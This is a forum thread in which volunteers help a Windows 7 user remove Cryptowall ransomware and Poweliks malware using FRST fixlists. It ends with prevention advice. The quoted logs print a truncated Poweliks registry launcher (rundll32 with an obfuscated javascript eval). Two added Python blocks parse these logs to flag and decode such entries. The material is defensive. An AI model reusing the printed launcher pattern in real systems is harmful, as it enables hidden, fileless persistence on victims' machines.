URL:Mal threats detected

Greetings,
Avast has been reporting a URL:Mal threat every few minutes (though sometimes it’s quiet for an hour or so). The objects reported are websites like 7508.sindelclick.com, go.wvydeo.com, and cdn.movieroomreviews1.com. The Task Manager shows several COM surrogate processes running; these are unusual for me to see in that list. They seem to be related to the threat messages, and when I end those they return after a short while.

When I first began noticing problems, there was also a file called INSTALL_TOR that had attached itself to almost every directory and folder on my machine. I found and deleted those, as well as some uninstall files that were related to them.

I have run scans with MBAM, FRST64, and aswMBR as suggested in the information guide I found on the forum. The scan logs for those are attached.

My machine is running Windows 7 Home Premium (with Service Pack 1) on a 64-bit OS; computer is an HP s5-1020 model.

I’m very appreciative of any help or further suggestions to deal with this threat.

You have Cryptowall… Do not make any changes until someone helps you.

Could you delete the following folder please, as my tools cannot handle the code: C:\Users\Campbells\AppData\Roaming\麽鎒駓覜

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-1478152029-1971740551-3079562967-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
Toolbar: HKCU - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
2014-10-28 22:10 - 2014-10-28 22:10 - 00008562 _____ () C:\Users\Campbells\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-28 22:10 - 2014-10-28 22:10 - 00008562 _____ () C:\Users\Campbells\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-28 22:10 - 2014-10-28 22:10 - 00004224 _____ () C:\Users\Campbells\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-28 22:10 - 2014-10-28 22:10 - 00004224 _____ () C:\Users\Campbells\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-28 22:10 - 2014-10-28 22:10 - 00000276 _____ () C:\Users\Campbells\AppData\Roaming\INSTALL_TOR.URL
2014-10-28 22:10 - 2014-10-28 22:10 - 00000276 _____ () C:\Users\Campbells\AppData\INSTALL_TOR.URL
2014-10-28 22:09 - 2014-10-28 22:09 - 00008562 _____ () C:\Users\Campbells\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-28 22:09 - 2014-10-28 22:09 - 00004224 _____ () C:\Users\Campbells\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-28 22:09 - 2014-10-28 22:09 - 00000276 _____ () C:\Users\Campbells\AppData\Local\INSTALL_TOR.URL
2014-10-28 22:07 - 2014-10-28 22:07 - 00008562 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-28 22:07 - 2014-10-28 22:07 - 00004224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-28 22:07 - 2014-10-28 22:07 - 00000276 _____ () C:\ProgramData\INSTALL_TOR.URL
2014-10-28 22:02 - 2014-10-28 23:37 - 00000000 ___HD () C:\f097c64
2014-10-28 22:02 - 2014-10-28 22:02 - 00087200 _____ () C:\ProgramData\wrnhoah.tmp
2014-10-28 22:02 - 2014-10-28 22:02 - 00000944 ____H () C:\ProgramData\@system2.att
2014-10-25 21:58 - 2014-10-25 21:58 - 00000000 _____ () C:\Windows\system32\clsjefw.dll
CustomCLSID: HKU\S-1-5-21-1478152029-1971740551-3079562967-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe.
Run FRST and press Fix.
On completion a log will be generated; please post that.

THEN

Download Anti-CryptorBit.zip to your desktop
Extract Anti-CryptorBitV2 to the desktop and run it

https://dl.dropboxusercontent.com/u/73555776/anticrypt.JPG

Select the file type you wish to decrypt and then follow the instructions
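The entry the fixlist above marks as Poweliks is a COM LocalServer32 value that starts rundll32.exe with a javascript: moniker, and the script text FRST printed ("epdvnfou/xsjuf...") is readable JavaScript with every character code shifted up by one. The Python below is an added example, not code from this thread or from FRST: it parses that one quoted log line, flags the launcher pattern a defender would alert on, and recovers the readable start of the script by trying small shifts. SAMPLE_LINE is copied from the log quoted above; the function names and the JS_MARKERS list are my own.

```python
import re

# Constructed sample: the CustomCLSID line quoted from the FRST log in this thread.
# FRST truncates long registry data and says how many characters it dropped.
SAMPLE_LINE = (
    r"CustomCLSID: HKU\S-1-5-21-1478152029-1971740551-3079562967-1000_Classes"
    r"\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> "
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
    'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds '
    "(the data entry has 247 more characters). <==== Poweliks?"
)

# Tokens a de-obfuscated script fragment is likely to contain (my own list).
JS_MARKERS = ("document", "write", "script", "eval", "window", "activexobject")

FRST_TRUNCATION = re.compile(r"\(the data entry has \d+ more characters\)")


def split_clsid_entry(line):
    """Split an FRST 'CustomCLSID:' line into (registry key, registry value).

    FRST's own '<==== ...' annotation is dropped. Returns None for other lines.
    """
    if not line.startswith("CustomCLSID:"):
        return None
    body = re.sub(r"\s*<====.*$", "", line[len("CustomCLSID:"):].strip())
    key, sep, value = body.partition(" -> ")
    return (key, value) if sep else None


def is_script_in_registry_launcher(value):
    """A LocalServer32 value should name an executable on disk.

    rundll32.exe started with a javascript: moniker means the COM server's
    code is the registry value itself, the pattern the log labels Poweliks.
    """
    lowered = value.lower()
    return "rundll32" in lowered and "javascript:" in lowered


def extract_eval_payload(value):
    """Return (text inside eval("..."), truncated_by_frst) or None."""
    m = re.search(r'eval\("(.*?)(?: \(the data entry has \d+ more characters\)\.?)?$', value)
    if not m:
        return None
    return m.group(1), bool(FRST_TRUNCATION.search(value))


def decode_shift(text, shift):
    """Undo a per-character code-point shift (shift=1 maps 'e' back to 'd')."""
    return "".join(chr(ord(ch) - shift) if ord(ch) >= shift else "\ufffd" for ch in text)


def guess_shift(text, max_shift=25):
    """Pick the shift whose decoding contains the most JS_MARKERS; None if no hit."""
    best_shift, best_score = None, 0
    for shift in range(1, max_shift + 1):
        decoded = decode_shift(text, shift).lower()
        score = sum(decoded.count(marker) for marker in JS_MARKERS)
        if score > best_score:
            best_shift, best_score = shift, score
    return best_shift


def analyse_clsid_line(line):
    """Summarise one FRST CustomCLSID line for a triage note."""
    parts = split_clsid_entry(line)
    if parts is None:
        return None
    key, value = parts
    report = {"key": key, "script_launcher": is_script_in_registry_launcher(value),
              "payload": None, "truncated": False, "shift": None, "decoded": None}
    found = extract_eval_payload(value)
    if found:
        payload, truncated = found
        shift = guess_shift(payload)
        report.update(payload=payload, truncated=truncated, shift=shift,
                      decoded=decode_shift(payload, shift) if shift else None)
    return report


if __name__ == "__main__":
    for field, val in analyse_clsid_line(SAMPLE_LINE).items():
        print(f"{field:16} {val}")
```

The detection keys on the launcher, not on the decoded text: a LocalServer32 value that starts an interpreter with inline code is worth a look whichever obfuscation the payload uses, and the shift guess is only there to give the analyst a readable fragment for the report.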

Thanks for the suggestions, which I have read a few minutes ago. I will post the logs you asked for in a little while.

I can’t find the folder you asked me to delete. Here is a cmd directory of the …\Roaming folder-- can you tell which one it might be?

c:\Users\Campbells\AppData\Roaming>dir
 Volume in drive C is OS
 Volume Serial Number is 94DD-6346

 Directory of c:\Users\Campbells\AppData\Roaming

10/30/2014  04:07 PM    <DIR>          .
10/30/2014  04:07 PM    <DIR>          ..
10/28/2014  10:09 PM    <DIR>          Adobe
10/28/2014  10:09 PM    <DIR>          Amazon
10/28/2014  10:10 PM    <DIR>          Apple Computer
07/10/2014  02:44 AM    <DIR>          Audacity
10/30/2013  05:42 AM    <DIR>          AVAST Software
10/28/2014  10:10 PM    <DIR>          Blio
10/28/2014  10:10 PM             8,562 DECRYPT_INSTRUCTION.HTML
10/28/2014  10:10 PM             4,224 DECRYPT_INSTRUCTION.TXT
10/30/2014  01:15 AM    <DIR>          Dropbox
10/13/2013  02:17 AM    <DIR>          dvdcss
10/28/2014  10:10 PM    <DIR>          FileZilla
08/06/2011  09:29 AM    <DIR>          Hewlett-Packard
08/06/2011  09:19 AM    <DIR>          Identities
10/28/2014  10:10 PM               276 INSTALL_TOR.URL
10/28/2014  10:10 PM    <DIR>          IObit
08/06/2011  12:51 AM    <DIR>          IrfanView
10/30/2014  04:07 PM    <DIR>          Lavasoft
10/30/2014  04:02 PM    <DIR>          LavasoftStatistics
05/27/2011  04:01 AM    <DIR>          Macromedia
10/28/2014  10:10 PM    <DIR>          MakeMusic
11/21/2010  03:16 AM    <DIR>          Media Center Programs
10/29/2014  06:45 AM    <DIR>          Mozilla
04/02/2013  03:14 PM    <DIR>          Namco
05/07/2014  06:31 AM    <DIR>          Oracle
10/28/2014  10:10 PM    <DIR>          QuickVerse 2009 Starter
10/28/2014  10:10 PM    <DIR>          Real
08/30/2013  08:22 AM    <DIR>          RealNetworks
08/14/2011  08:43 AM    <DIR>          Sibelius Software
10/28/2014  10:10 PM    <DIR>          Skype
07/23/2013  08:54 AM    <DIR>          SoftGrid Client
10/28/2014  10:10 PM    <DIR>          Spotify
08/06/2011  10:44 PM    <DIR>          TP
08/06/2011  08:50 AM    <DIR>          vlc
04/02/2013  03:12 PM    <DIR>          WildTangent
               3 File(s)         13,062 bytes
              33 Dir(s)  838,919,426,048 bytes free

OK, I followed the steps for running the FRST fix. The log file for that process is attached.

I will also work on using Anti-CryptorBit, which I’m guessing will help me get back some files which have been corrupted or encrypted. If so, thanks very much for the tip, because indeed there are some messed up files to rescue!

Thanks for this support, which I felt was provided in a personable and respectful manner. I’ve seen some forums for other software in which the experts are a bit snarky with us poor users who are just trying to get by. :slight_smile:

If there are other steps, I will gladly follow further instructions. If not, thanks again.

Some info for you to read up on… ==>
2014-10-28 22:02 - 2014-10-28 22:02 - 00000448 ____H () C:\Users\Campbells\AppData\Roaming\麽鎒駓覜

The H part means it’s hidden. Since you’re using Windows 7…

Open Folder Options by clicking the Start button, clicking Control Panel, clicking Appearance and Personalization, and then clicking Folder Options.
Click the View tab.
Under Advanced settings, click Show hidden files and folders, and then click OK.

You may also need to check the System Files.Folders/Drives… That should allow you to see the randomly named folder :slight_smile:
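Michael’s point is that FRST prints each file’s attributes as a five-character field in which H marks a hidden item, which is why the folder never appeared in the plain dir listing earlier in the thread (33 directories, none of them the hidden one). The Python below is an added example, not code from this thread or from FRST: it parses FRST file lines copied from the log quoted in this thread and reports what a default dir would not have shown, plus names that look out of place in an English-language profile. The regex, the function names and the S and R attribute letters are assumptions of mine; only H and D are confirmed by this page.

```python
import re

# FRST "Files" entries: created - modified - size attrs (company) path.
# The regex is my reading of the lines quoted in this thread, not FRST's spec.
FRST_FILE_LINE = re.compile(
    r"^(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<modified>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<size>\d{8}) (?P<attrs>[_A-Z]{5}) \((?P<company>[^)]*)\) (?P<path>.+)$"
)

# H (hidden) and D (directory) are shown in this thread's log; S (system) and
# R (read-only) are assumed from the standard Windows attribute letters.
ATTRIBUTE_NAMES = {"H": "hidden", "D": "directory", "S": "system", "R": "read-only"}

# Constructed sample: lines copied from the FRST log quoted in this thread,
# plus one non-file line to show the parser ignores it.
SAMPLE_LOG = [
    r"2014-10-28 22:10 - 2014-10-28 22:10 - 00008562 _____ () C:\Users\Campbells\AppData\Roaming\DECRYPT_INSTRUCTION.HTML",
    r"2014-10-28 22:02 - 2014-10-28 23:37 - 00000000 ___HD () C:\f097c64",
    r"2014-10-28 22:02 - 2014-10-28 22:02 - 00000944 ____H () C:\ProgramData\@system2.att",
    r"2014-10-28 22:02 - 2014-10-28 22:02 - 00000448 ____H () C:\Users\Campbells\AppData\Roaming\麽鎒駓覜",
    r"2014-10-25 21:58 - 2014-10-25 21:58 - 00000000 _____ () C:\Windows\system32\clsjefw.dll",
    r"Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File",
]

HIDDEN_REASON = "hidden attribute (not shown by dir without /a)"
NON_ASCII_REASON = "non-ASCII name"


def parse_file_entry(line):
    """Parse one FRST file line into a dict; None for lines of another kind."""
    m = FRST_FILE_LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["size"] = int(entry["size"])
    # Underscores are unset attribute slots; letters are looked up by name.
    entry["flags"] = {ATTRIBUTE_NAMES.get(ch, ch) for ch in entry["attrs"] if ch != "_"}
    entry["name"] = entry["path"].rsplit("\\", 1)[-1]
    return entry


def is_hidden(entry):
    return "hidden" in entry["flags"]


def has_non_ascii_name(entry):
    return any(ord(ch) > 127 for ch in entry["name"])


def review(lines):
    """Return {path: [reasons]} for entries worth a second look.

    Hidden items are exactly the ones a plain `dir` (no /a) leaves out, so
    they need to be enumerated from the log rather than from Explorer.
    """
    findings = {}
    for line in lines:
        entry = parse_file_entry(line)
        if entry is None:
            continue
        reasons = []
        if is_hidden(entry):
            reasons.append(HIDDEN_REASON)
        if has_non_ascii_name(entry):
            reasons.append(NON_ASCII_REASON)
        if reasons:
            findings[entry["path"]] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in review(SAMPLE_LOG).items():
        print(path, "->", "; ".join(reasons))
```

Run against the sample, the three hidden items come back and the Roaming folder is the only one also flagged for its name, which matches what the dir listing earlier in the thread failed to show.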

Excellent! Found that element… and now it’s gone. :slight_smile:

Thanks Michael, mayhap I should add that as standard, although this is a new element to that malware :slight_smile:

Once you have completed Anti-CryptorBit, can you let me know what problems remain?

The computer is running very smoothly now, with no threat announcements from Avast and no COM surrogate indications in Task Manager. All seems fine on that score.

On the other hand, I am not having any success with Anti-CryptorBit. The files I have tried it on so far-- text files, Office documents, jpegs, and PDFs-- have all been unrecoverable. Anti-CryptorBit has reported that some cannot be repaired and that others have been recovered; but those that have been recovered cannot be opened by, say, Microsoft Word. When I tried to open a recovered .doc file after applying Anti-CryptorBit, MS-Word said the file was still corrupted. Word suggested using “Open and repair” and also suggested a “Recover text from any type of file” option with its installed File Recover tool. However, those attempts only returned gibberish instead of real information. Fortunately, about 3/4 of my files were not affected by the virus, so I’m not totally wiped out.

If you have any other recovery options to suggest, that would be great. Still, I’m thankful that there is no ongoing threat. If some files are lost forever, I will just have to deal with that. Some are backed up on an external hard drive, but it’s been too long since I did that, so I’m sure not all are there. Lesson learned about back-ups!

Thank you…

I am afraid the only way to recover those files now is from backups.

Subject to no further problems :slight_smile:

I will remove my tools now and give some recommendations, but I would like you to run for 24 hours or so and come back if you have any problems.

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself so… The following will implement some cleanup procedures as well as reset System Restore points:

Download and run Delfix

https://dl.dropboxusercontent.com/u/73555776/delfix.JPG

Keep Java Updated:

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to disable Java in your web browser and How to unplug Java from the browser)

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent: install this programme to lock down and prevent crypto ransomware

https://dl.dropboxusercontent.com/u/73555776/CryptoPrevent.JPG

Malwarebytes.

Update and run weekly to keep your system clean

It is critical to have both a firewall and antivirus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet, read this little guide: Best security practices. Keep safe :wave:

Thank you for those notes. The Delfix log is attached, just for info. I will come back if there are issues later on, but otherwise all seems to be the best it can be at the moment.

Thanks and keep safe

Well, I wonder if something leftover is going on now. The hard disk started running non-stop, and a check of Task Manager showed about six or eight processes called qmmhklzi.exe *32 running, with Google Chrome as the description-- even though Google Chrome was closed at the time. I ended those processes, but they returned on their own.

The file location for all these processes seemed to be found in
c:\programdata\microsoft\playready\rtxqdjgq\fytivwmy
which had three files all installed on November 1 at 7:11 pm (about 4-1/2 hours after I first noticed the strange behavior). I tried to delete one file named qmmhklzi.exe found there, but I was not able to do that because the process was active. (It sure was!) There was also a subfolder named 36.0.1985.143, if that turns out to be a relevant IP address or something.

I ran a scan with MBAM, and it found several Trojan items. I quarantined all of them, and the strange processes stopped running. The file folder mentioned above still exists, but the program qmmhklzi.exe had its name changed to 000000000000000004.0x0. I have attached the MBAM log here.

After all of that, I also ran another scan with FRST64. I have attached the relevant logs here as well.

I am in the midst of running a scan with aswMBR, too, but that will take a while, so I am going to bed now and will post that log in the morning here.

The aswMBR scan finished faster than I thought. It just closed, so it’s posted here now as well.

OK, let’s clear those, then I will look at the previous logs to see if I missed them there.

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

C:\Users\Campbells\AppData\Local\Apple
c:\programdata\microsoft\playready\rtxqdjgq
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe.
Run FRST and press Fix.
On completion a log will be generated; please post that.

Thanks… the fixlog results are attached.

No sign of those folders in the previous logs; did you download any programmes apart from the recommended ones?

No, there were no additional downloads, but my wife remembers checking email around that time, and then she said about a half-hour later Avast reported blocking something (though she didn’t remember exactly what was blocked).

Maybe this is just an unrelated occurrence that only coincidentally happened soon after the previous one. In any case, the family had a conversation at breakfast about being careful where you click. :wink:

Regardless of the cause, there have been no repeated threats or strange processes after my most recent report and MBAM cleanse.

God’s blessings on this Sunday, and thanks for your help again.

No problem, I was just curious was all. You can just delete FRST when you are happy.

OK, thanks… all set. Take care.